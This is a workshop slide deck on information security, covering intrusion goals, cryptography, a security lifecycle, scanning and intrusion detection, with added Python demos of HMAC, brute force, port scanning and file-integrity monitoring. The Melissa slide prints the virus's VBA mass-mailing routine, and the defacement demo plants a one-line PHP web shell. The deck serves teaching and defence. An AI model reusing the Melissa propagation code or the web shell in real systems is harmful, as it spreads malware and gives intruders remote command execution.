Student Financial Assistance. Session 4: Information Security: Protecting your Digital Resources


  • Session 4: Information Security: Protecting your Digital Resources

    Session 4 -

  • Discussion Agenda
    - Goals of an intrusion
    - Categories of risk
    - Effects and consequences of a compromise
    - Techniques of security
    - Reducing the risk: the Security Lifecycle


  • Intrusion Goals
    - Defacement
    - Utilization of resources as an anonymous platform for other attacks
    - Performance degradation
    - Data collection/manipulation


  • Risk Categories
    - Hacking: usually accomplished by exploiting a known vulnerability in COTS software
    - Cracking: usually accomplished by guessing weak or default passwords
    - Spoofing: impersonation used to obtain credentials (telephone, email, website, etc.)

    All three aim at obtaining elevated privileges


  • Risk Categories (cont)
    - Trojan Horse: malicious code hidden inside something the user runs willingly; unlike a worm it does not spread by itself (Code Red was a self-replicating worm that spread through an IIS vulnerability, not email; Melissa, on the next slide, spread by mailing itself)
    - Denial: denial of service (e.g. ping flood)
    - Sabotage: an insider, e.g. a disgruntled systems engineer
    - Unintentional: natural disaster
    - and more...


  • Melissa
    Mass-mailing routine of the Melissa Word macro virus (1999): it sends the infected document to the first 50 entries of every Outlook address list, once per machine.

    ' Melissa mass-mailer (the excerpt shown on the slide)
    Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
    Set UngaDasOutlook = CreateObject("Outlook.Application")   ' drive Outlook through automation
    Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")       ' reach the MAPI address books
    ' Registry marker so the machine is only used to mail once
    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
        If UngaDasOutlook = "Outlook" Then
            DasMapiName.Logon "profile", "password"
            For y = 1 To DasMapiName.AddressLists.Count
                Set AddyBook = DasMapiName.AddressLists(y)
                x = 1
                Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)        ' 0 = olMailItem, a new message
                For oo = 1 To AddyBook.AddressEntries.Count
                    Peep = AddyBook.AddressEntries(x)
                    BreakUmOffASlice.Recipients.Add Peep
                    x = x + 1
                    If x > 50 Then oo = AddyBook.AddressEntries.Count       ' stop at 50 recipients per list
                Next oo
                BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
                BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
                BreakUmOffASlice.Attachments.Add ActiveDocument.FullName    ' attach the infected document itself
                BreakUmOffASlice.Send
                Peep = ""
            Next y
        End If
    End If


  • Effects of a Compromise
    - Unreliable data: surreptitious manipulation or explicit destruction
    - Bad neighbor: not even recognizing you've been compromised, and being used as a platform for attacks on others
    - Performance: if there is any...


  • Consequences
    - Financial: data restoration, downtime, liquidated damages, etc.
    - Legal: due diligence is required to protect Privacy Act data, consumer information, etc.
    - Lost confidence: it's a tough sell to tell customers/business partners it won't happen again


  • Who would do such a thing...
    - Criminal
    - Magician
    - Consumer Advocate
    - Political Activist (WTO, Civil Rights, etc.)
    - Cyber-Warrior
    - Security Professional*


  • Core Security Services
    - Identification/Authentication: something you know, have, or are
    - Authorization: providing the right services to the right user
    - Confidentiality: keeping message contents from unauthorized readers, through cryptography
    - Integrity: is that what I sent or stored?
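    The integrity service in practice, as an added example that is not part of the original slides: a bare hash answers "was this corrupted in transit?" but not "was this altered by someone?", because whoever can edit the message can recompute the hash. A keyed MAC (HMAC-SHA256 here) needs the shared secret, so the receiver can tell the sender's message from an attacker's. The transaction record, the key and the attacker's edit are constructed for the demonstration.

```python
import hashlib
import hmac
import secrets

# Constructed sample: a record the sender transmits, and a secret shared
# only by sender and receiver (hypothetical values for the demo).
MESSAGE = b"transfer;from=acct-1001;to=acct-2002;amount=100.00"
SHARED_KEY = secrets.token_bytes(32)


def unkeyed_digest(message: bytes) -> str:
    """A bare SHA-256 checksum; anyone who sees the message can recompute it."""
    return hashlib.sha256(message).hexdigest()


def keyed_tag(key: bytes, message: bytes) -> str:
    """HMAC-SHA256: only a holder of `key` can produce a valid tag."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def verify_tag(key: bytes, message: bytes, tag: str) -> bool:
    # compare_digest runs in constant time, so the comparison itself does
    # not leak how many leading characters of a guessed tag were right.
    return hmac.compare_digest(keyed_tag(key, message), tag)


def tamper(message: bytes) -> bytes:
    """What an attacker on the wire does: change the amount in transit."""
    return message.replace(b"amount=100.00", b"amount=9999.00")


def checksum_survives_tampering() -> bool:
    """The attacker edits the message and recomputes the plain hash, so an
    unkeyed checksum still 'verifies' on the receiving side."""
    forged = tamper(MESSAGE)
    forged_checksum = unkeyed_digest(forged)      # attacker's recomputation
    return unkeyed_digest(forged) == forged_checksum


def hmac_detects_tampering() -> bool:
    """Without the key the attacker cannot make a tag for the edited message;
    the original tag verifies the original message and nothing else."""
    tag = keyed_tag(SHARED_KEY, MESSAGE)          # computed by the sender
    forged = tamper(MESSAGE)
    return verify_tag(SHARED_KEY, MESSAGE, tag) and not verify_tag(SHARED_KEY, forged, tag)


if __name__ == "__main__":
    print("plain checksum fooled:", checksum_survives_tampering())
    print("HMAC caught the edit: ", hmac_detects_tampering())
```

    A MAC gives integrity plus origin authentication for anyone holding the key; it does not stop an attacker replaying an old, correctly tagged message, which needs a sequence number or timestamp inside the tagged data.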


  • Cryptography 101
    - Symmetric
      1 key shared between the parties
      simple to implement, inexpensive to deploy; the shared key still has to be distributed securely
      high encryption speeds
    - Asymmetric
      2 distinct but mathematically related keys per person (one public, one private)
      no shared secret to distribute, which is its real advantage; more expensive; used in PKI
      slower encryption speeds, so in practice it protects a symmetric key that encrypts the bulk data


  • Cryptography 201
    - Algorithm choices
      Various choices with different strengths/weaknesses: RC5, DES, AES, etc.
      Asymmetric algorithms are based on hard mathematical problems (e.g. factoring a product of two large primes); symmetric ciphers such as the three above are built from well-studied substitution and permutation rounds instead
    - Key sizes
      The larger the key, the more work an exhaustive (brute-force) search takes: every added bit doubles it. DES's 56-bit key is too small by today's standards; it was brute-forced publicly in 1998.


  • Things to avoid in a COTS Vendor...
    - "Trust us, we're experts": right...
    - Secret algorithms: so how good are they? Published algorithms get years of public scrutiny; secret ones get none
    - "Revolutionary breakthrough": security is like new pharmaceuticals, not cars; it needs years of review before it earns trust
    - "Unbreakability": no such thing (brute force always works eventually; the only question is how long it takes)
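    To make the key-size and brute-force points concrete, an added example that is not from the slides: a deliberately toy cipher (a SHA-256-derived keystream XORed with the plaintext; not a real algorithm and not safe to use) whose key is a small integer, and an exhaustive key search against it using a known plaintext/ciphertext pair. The message and keys are constructed for the demo; the search is small enough to run in well under a second at 16 bits.

```python
import hashlib
from typing import Tuple

# Toy cipher for illustration only: key = integer of `key_bits` bits,
# keystream = SHA-256(key || counter) blocks, ciphertext = plaintext XOR keystream.
# It exists solely to make an exhaustive key search observable at small sizes.


def keystream(key: int, key_bits: int, length: int) -> bytes:
    key_bytes = key.to_bytes((key_bits + 7) // 8, "big")
    stream = b""
    counter = 0
    while len(stream) < length:
        stream += hashlib.sha256(key_bytes + counter.to_bytes(4, "big")).digest()
        counter += 1
    return stream[:length]


def toy_encrypt(key: int, key_bits: int, plaintext: bytes) -> bytes:
    return bytes(p ^ k for p, k in zip(plaintext, keystream(key, key_bits, len(plaintext))))


toy_decrypt = toy_encrypt  # XOR with the same keystream is its own inverse


def brute_force(ciphertext: bytes, known_plaintext: bytes, key_bits: int) -> Tuple[int, int]:
    """Exhaustive search over every possible key, checking each candidate
    against the known plaintext. Returns (recovered_key, trials). The worst
    case is 2**key_bits trials and the average half that; each extra key
    bit doubles both, which is all "bigger key = harder to break" means."""
    for candidate in range(1 << key_bits):
        if toy_decrypt(candidate, key_bits, ciphertext) == known_plaintext:
            return candidate, candidate + 1
    raise ValueError("no key reproduced the known plaintext")


def search_space(key_bits: int) -> int:
    """Number of keys an attacker must be prepared to try."""
    return 1 << key_bits


# Constructed demo data: the same message under a 12-bit and a 16-bit key.
PLAINTEXT = b"ATTACK AT DAWN"
KEY_12 = 0xABC
KEY_16 = 0xBEEF


def demo() -> dict:
    results = {}
    for bits, key in ((12, KEY_12), (16, KEY_16)):
        ct = toy_encrypt(key, bits, PLAINTEXT)
        recovered, trials = brute_force(ct, PLAINTEXT, bits)
        results[bits] = {"recovered": recovered, "trials": trials, "space": search_space(bits)}
    return results


if __name__ == "__main__":
    for bits, r in demo().items():
        print(f"{bits}-bit key: recovered {r['recovered']:#x} after {r['trials']} of {r['space']} trials")
```

    Scaling the same arithmetic up is the whole argument about key sizes: 2**56 for DES is about 7.2e16 trials, which purpose-built hardware finished in days in 1998, while 2**128 for AES-128 is beyond any foreseeable search. Brute force is always available, so "unbreakable" is a marketing word; the engineering question is whether the search is long enough to be irrelevant.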


  • So how do we protect ourselves?
    - Holistic approach
    - Determine the true value at risk, then determine the level of protection
    - Be prepared to invest financial and human resources
    - Balance convenience with security
    - Recognize it's a journey...


  • Security Lifecycle


  • Plan your work
    A Security Policy Document is critical to successfully define the minimum security criteria for a given system.
    - All AGI should participate and sign off
    - The template can be tailored to business risk/value


  • Security Policy Template
    - Network Layer Policies: router, firewall, DNS policies
    - Application Layer Policies: token characteristics, crypto specifications
    - Operating System Policies: vendors, patch levels, minimum install
    - Operational Policies: backups, staffing/access, incident notification/response, virus updates
    - System Architecture Policies: IV&V, imposed standards, policy maintenance


  • Design
    - Design in concert with the Security Plan
    - Architects should have security experience
    - Define the resources to secure and the mechanisms to do it (e.g. SSL will be used for screens containing SSNs)
    - Select technologies that have superior track records


  • Develop
    - Develop in concert with the Security Plan
    - Share the importance of security with the team
    - Perform peer code reviews for weaknesses/backdoors


  • Test
    - Vulnerability Analysis
      measures system exposure
      tools: NMAP (open-source port scanner), CyberScanner (commercial multi-function scanner), SATAN (open-source multi-function scanner)
    - Independent Penetration Testing
      3rd-party verification of the security status of a system
      many companies offer white-hat services
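    What a port scanner does at its simplest, as an added example (not code from the slides or from NMAP itself): a TCP connect scan, which reports a port open when the full three-way handshake succeeds. The target is constructed on the loopback interface so the example runs offline; it assumes loopback networking is available.

```python
import socket
from typing import Dict, Iterable


def tcp_connect_scan(host: str, ports: Iterable[int], timeout: float = 0.5) -> Dict[int, str]:
    """Full TCP connect scan, the technique behind `nmap -sT`: a port is
    'open' if the three-way handshake completes and 'closed' if the target
    answers with a reset or nothing arrives before the timeout. Every probe
    completes a real connection, so the target's logs record each one."""
    results: Dict[int, str] = {}
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            results[port] = "open" if s.connect_ex((host, port)) == 0 else "closed"
    return results


def demo_scan() -> Dict[str, object]:
    """Constructed target: listen on an OS-chosen loopback port, find a
    second port that nothing is listening on, and scan both. The kernel
    completes the handshake from the listen backlog, so no accept() loop
    is needed for the open port to show up."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    open_port = listener.getsockname()[1]

    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]
    probe.close()  # bound but never listening, so a connect gets a reset

    try:
        results = tcp_connect_scan("127.0.0.1", [open_port, closed_port])
    finally:
        listener.close()
    return {"open_port": open_port, "closed_port": closed_port, "results": results}


if __name__ == "__main__":
    print(demo_scan())
```

    A connect scan needs no privileges and is easy to write, which is also why it is noisy: the intrusion-detection tools on the Maintain slides see it as a burst of connections to many ports from one source. NMAP's default SYN scan avoids completing the handshake for that reason, at the cost of needing raw-socket privileges.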


  • Maintain
    Two main aspects of maintenance:
    - Tool oriented
    - Process/procedure oriented


  • Maintain - Tools
    - Intrusion Detection
      active monitoring of network protocol traffic, log files, port scanning
      responses from alarms to countermeasures!
      e.g. ManHunt by Recourse Technologies, BlackICE Defender by Network ICE
    - Content Monitoring
      active monitoring of server file content
      automated alert/recovery on file modification (defacement)
      e.g. Tripwire for Servers by Tripwire
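    Added example covering both tool categories on this slide; it is not from the slides and not the products named above. The first part is the log-file side of intrusion detection: a detector that reads firewall drop records and flags a source that has touched many distinct ports on one host, which is what a port scan looks like from the defender's side. The second is Tripwire-style content monitoring: a hash baseline of a web root compared against a fresh scan to report defaced, planted and deleted files. The log format and the web-root contents are constructed for the demonstration.

```python
import hashlib
import os
import tempfile
from collections import defaultdict
from typing import Dict, List, Set

# ---- Intrusion detection over log lines ----------------------------------
# Constructed firewall log in an assumed "timestamp ACTION key=value ..."
# layout (not any particular product's format). 203.0.113.7 sweeps seven
# ports; 198.51.100.4 just retries the web server twice.
SAMPLE_LOG = """\
2001-10-02T10:00:01 DROP src=203.0.113.7 dst=192.0.2.10 dport=21
2001-10-02T10:00:01 DROP src=203.0.113.7 dst=192.0.2.10 dport=22
2001-10-02T10:00:02 DROP src=203.0.113.7 dst=192.0.2.10 dport=23
2001-10-02T10:00:02 DROP src=203.0.113.7 dst=192.0.2.10 dport=25
2001-10-02T10:00:03 DROP src=203.0.113.7 dst=192.0.2.10 dport=80
2001-10-02T10:00:03 DROP src=203.0.113.7 dst=192.0.2.10 dport=110
2001-10-02T10:00:04 DROP src=203.0.113.7 dst=192.0.2.10 dport=143
2001-10-02T10:00:09 DROP src=198.51.100.4 dst=192.0.2.10 dport=80
2001-10-02T10:00:10 DROP src=198.51.100.4 dst=192.0.2.10 dport=80
"""


def detect_port_scans(log_text: str, threshold: int = 5) -> Dict[str, Set[int]]:
    """Flag each (source, destination) pair whose distinct destination ports
    reach `threshold`. Counting distinct ports, not packets, keeps a client
    retrying one service from looking like a scan."""
    ports_by_pair: Dict[tuple, Set[int]] = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        fields = dict(f.split("=", 1) for f in line.split()[2:])
        ports_by_pair[(fields["src"], fields["dst"])].add(int(fields["dport"]))
    return {f"{src}->{dst}": ports for (src, dst), ports in ports_by_pair.items()
            if len(ports) >= threshold}


# ---- Tripwire-style content monitoring -----------------------------------
def file_baseline(root: str) -> Dict[str, str]:
    """Map every file under `root` (path relative to root) to its SHA-256."""
    baseline: Dict[str, str] = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                baseline[os.path.relpath(path, root)] = hashlib.sha256(fh.read()).hexdigest()
    return baseline


def compare_baselines(old: Dict[str, str], new: Dict[str, str]) -> Dict[str, List[str]]:
    """Report what changed between two snapshots; any non-empty list is an alert."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }


def demo_defacement() -> Dict[str, List[str]]:
    """Constructed scenario: snapshot a small web root, then deface the index
    page, plant a web shell and delete a page; the comparison reports all three."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in {"index.html": b"<h1>Welcome</h1>",
                           "about.html": b"<p>About us</p>",
                           "css/site.css": b"body{}"}.items():
            os.makedirs(os.path.dirname(os.path.join(root, name)), exist_ok=True)
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        before = file_baseline(root)
        with open(os.path.join(root, "index.html"), "wb") as fh:
            fh.write(b"<h1>0wned</h1>")
        with open(os.path.join(root, "shell.php"), "wb") as fh:
            fh.write(b"<?php system($_GET['c']); ?>")
        os.remove(os.path.join(root, "about.html"))
        return compare_baselines(before, file_baseline(root))


if __name__ == "__main__":
    print("scans:", detect_port_scans(SAMPLE_LOG))
    print("changes:", demo_defacement())
```

    Two caveats a real deployment has to handle: the detector above keys on distinct ports with no time window, so a slow scan spread over days still accumulates (good) but so does a month of legitimate traffic to many services (bad); production tools window the count. And the baseline must live where the intruder cannot rewrite it (read-only media, a signed copy, or another host), otherwise the first thing a competent attacker does after defacing the site is re-baseline it.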


  • Maintain - Tools
    - Honeypot Monitoring
      diversionary tactic
      dummy site to entice, expose, then exhaust a hacker
      e.g. Deception ToolKit (DTK), ManTrap by Recourse Technologies
    - Tarpits
      entice, then entrap self-replicators
      e.g. LaBrea


  • Maintain - Processes
    - Security Awareness
      Subscribe to weekly newsletters (SANS)
    - Protect your authentication tokens
      no post-its
      no sharing
    - Review the FBI's Top 20 Security Mistakes issued on 10/2/2001 and make sure you aren't wanted! (http://66.129.1.101/top20.htm)


  • Maintain - Processes
    - Configuration Management
      Use defined procedures for modifications
      Require review boards
      Allow only authorized staff to make changes
    - Regular virus prevention
    - Backup
      offsite
      rotated media


  • Maintain - Processes
    Hmm...
    "At the CERT Coordination Center, we have learned that over 95% of all network intrusions could be avoided by keeping your computer systems up to date with patches from your operating system and applications vendors. If you do nothing else, you should install these patches wherever possible, and as quickly as possible."


  • Internet Resources

    Resource                                    URL                                          Comment
    SysAdmin, Audit, Network, Security (SANS)   www.sans.org                                 Excellent email newsletter; hosts the FBI/SANS Top 20 list
    CERT by Carnegie Mellon                     www.cert.org                                 One of the original security sites on the net
    RSA Labs Cryptography FAQ                   www.rsasecurity.com/rsalabs/faq/index.html   Learn how cryptography works
    Attrition Hacker Site                       www.attrition.org                            Their motto: "Don't let school get in the way of your education"
    PentaSafe Publications                      www.baselinesoft.com                         Security policy templates

  • Thanks for coming!
    This presentation will be posted at this site at the conclusion of the EAC series: http://edeworkshop.ncspearson.com/
    Thank you and see you next year!
